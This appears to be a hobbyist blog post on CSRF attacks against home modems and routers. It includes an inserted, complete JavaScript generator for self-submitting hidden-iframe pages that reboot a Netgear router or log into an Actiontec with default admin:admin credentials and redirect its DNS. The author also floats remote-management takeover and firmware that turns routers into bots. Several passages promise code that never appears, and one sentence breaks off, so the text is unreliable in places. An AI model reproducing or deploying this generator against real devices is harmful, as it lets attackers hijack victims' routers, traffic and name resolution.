The Surfboard cable modem offers little in functionality besides rebooting, unless of course I wanted to be malicious and wipe all settings on the cable modem, essentially turning it into a doorstop until the ISP can activate the thing again.
But that would be a real dick move.
Why does this attack work? First off, the reboot request is unauthenticated, so anyone on the local network can send it. The rest is getting the victim to send it for you: this is cross-site request forgery (CSRF), and XSS, a malicious page or an iframe all come in handy when you want the victim's browser to visit somewhere. Since the victim's browser is the one running the script and not me, it is already on the local network and can reach the modem.
What about CenturyLink? I've got you covered here for their modern Actiontecs.
Am I done with modems? NO! There’s 1 more gem to go over!
I was rummaging through my old stuff and found an old DSL modem: yet another Actiontec, this one from Qwest Internet (now known as CenturyLink).
Just booting the thing up and browsing to the setup page I found this:
An arbitrary file download vulnerability. I used it to pull the firmware and read the ELF binary inside.
Running strings on it gave me enough to Google a little more info on the thing. I came across
Just insert the code into an iframe or web page and wait.
What if I wanted to attack people's routers instead of the modem? Most consumer routers are at least password protected, but for the most part they still use the out-of-the-box defaults. Because who sets the password these days, right? Not my dad!
So how would you attack them? My Netgear, for example, uses HTTP Basic auth, and out of the box the default username/password combo is admin:admin. Once the victim's browser has authenticated to the router during its browsing session it re-sends those cached credentials on later requests to the same origin, including ones a malicious page triggers; embedding them in the URL (http://admin:admin@192.168.1.1/...) used to work too, but newer browsers block or prompt on that.
So two values need to be POSTed to the URI /apply.cgi?/reboot_waiting.htm:
name="yes" value="Yes"
name="submit_flag" value="reboot"
So we do something like so:
This should reboot a Netgear router, assuming they didn't change the default password.
Rebooting the router is only the tip of the iceberg. What if I coded this to change the user's DNS servers to my own? Or better yet, enabled remote management? The real fun comes when we consider the possibility of pushing a custom firmware image, like a modified OpenWrt build that calls home and turns the router into a bot. All from visiting a compromised site, or better yet, through some reflected XSS somewhere. Why bother installing malware on the victim's PC when I can own everyone behind the router instead?
Code time! Let’s dive right in.
Disable the net? Sure.
Enable remote administration? Why not.
When you first visit the admin page there is no HTTP auth prompt; it's a form-based login instead. The router keeps the session state on its own side rather than relying on a cookie or a Basic-auth header from the browser, and that is what makes the next trick possible: once the victim's browser has submitted the login form, the router treats that browser's later requests as authenticated.
So how do we go about having some fun? In this example we'll modify the DNS settings, because if you control your victim's DNS you control where every name they look up resolves: phishing pages on the right hostnames, interception of plaintext traffic, and so on (HTTPS sites will still throw certificate warnings rather than silently go along). First off we'll need to authenticate:
Then we submit to ‘h_wan_fix.cgi’ our settings after we’ve logged in:
In keeping with the other content, we can’t leave out the reboot code can we?
Now we adapt to our needs:
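Here is an added example, not the post's own code, that builds the attack page for the form-based attacks above: a single step reproduces the Netgear reboot, and two or more steps are replayed in order from the victim's browser with a pause between them, which is what the Actiontec login-then-DNS sequence needs. Only /apply.cgi?/reboot_waiting.htm, its two fields and h_wan_fix.cgi come from the post; the router addresses, the login path and the login/DNS field names are placeholders that must be read from the real device's own HTML forms.

```javascript
// Added example (not from the post): generate a self-submitting CSRF page.
// Each step is one hidden form posting into its own hidden iframe, so the
// victim's page never navigates away and the router sees ordinary POSTs
// from a browser already on the LAN.

const NETGEAR = "http://192.168.1.1";      // assumed LAN address
const ACTIONTEC = "http://192.168.0.1";    // assumed LAN address
const STEP_DELAY_MS = 3000;                // time to let the router process a step

// One step: the Netgear reboot fields from the post.
const NETGEAR_REBOOT = [
  { action: `${NETGEAR}/apply.cgi?/reboot_waiting.htm`,
    fields: { yes: "Yes", submit_flag: "reboot" } },
];

// Two steps: log in, then push DNS settings.
const ACTIONTEC_DNS = [
  // step 1: login. Path and field names are placeholders (assumptions).
  { action: `${ACTIONTEC}/login.cgi`,
    fields: { username: "admin", password: "admin" } },
  // step 2: the post names h_wan_fix.cgi; the field names are placeholders.
  { action: `${ACTIONTEC}/h_wan_fix.cgi`,
    fields: { dns1: "203.0.113.53", dns2: "203.0.113.54" } },
];

function htmlEscape(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The body a browser sends for a form POST (application/x-www-form-urlencoded);
// handy to compare against a capture of the real admin page submitting.
function encodeBody(fields) {
  return Object.entries(fields)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join("&")
    .replace(/%20/g, "+");
}

function hiddenInputs(fields) {
  return Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${htmlEscape(k)}" value="${htmlEscape(v)}">`)
    .join("\n");
}

// Build the HTML page. The inline script submits form f0, waits, then f1, and
// so on; each request carries whatever credentials the browser has cached.
function csrfPage(steps) {
  const forms = steps.map((s, i) => `
<iframe name="t${i}" style="display:none"></iframe>
<form id="f${i}" method="POST" target="t${i}" action="${htmlEscape(s.action)}">
${hiddenInputs(s.fields)}
</form>`).join("");
  const script = `
var i = 0;
function next() {
  if (i >= ${steps.length}) return;
  document.getElementById("f" + i).submit();
  i++;
  setTimeout(next, ${STEP_DELAY_MS});
}
next();`;
  return `<!doctype html>\n<html><body>${forms}\n<script>${script}\n</script></body></html>`;
}

// Usage: write csrfPage(ACTIONTEC_DNS) to a file and serve it from any origin;
// the victim only has to load it. csrfPage(NETGEAR_REBOOT) gives the reboot page.
```

The fixed delay between steps is deliberate: a cross-origin iframe's load event is not a reliable signal that the router finished processing, so a generous pause is simpler and more robust than chaining on load.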
What about other routers and modems? Where does one go to get info on this? I found SetupRouter.com to be extremely helpful for finding manuals, default passes, and settings.
How could routers and modems defend against such an attack? CSRF tokens. In fact, I was trying this against a friend's newer Netgear and it had this protection in the form of a "timestamp" variable that every form carries and every POST is checked against. Clever. Because the value is unpredictable and only readable from the router's own pages, the attacker's page can't read it cross-origin (the same-origin policy stops that) and so can't include it in a forged request, and the POST is rejected. Note that the SameSite cookie defaults in newer browsers do nothing here, since these routers authenticate with Basic auth or track the logged-in client themselves rather than with a cookie. What this means is my attack will only silently own older Netgears 🙁
This post could go on and on, but I don’t have the funds to buy every router / modem out there and test. Part of the reason why I stuck to Cox / Qwest – they’re local to Phoenix. No FIOS here unfortunately.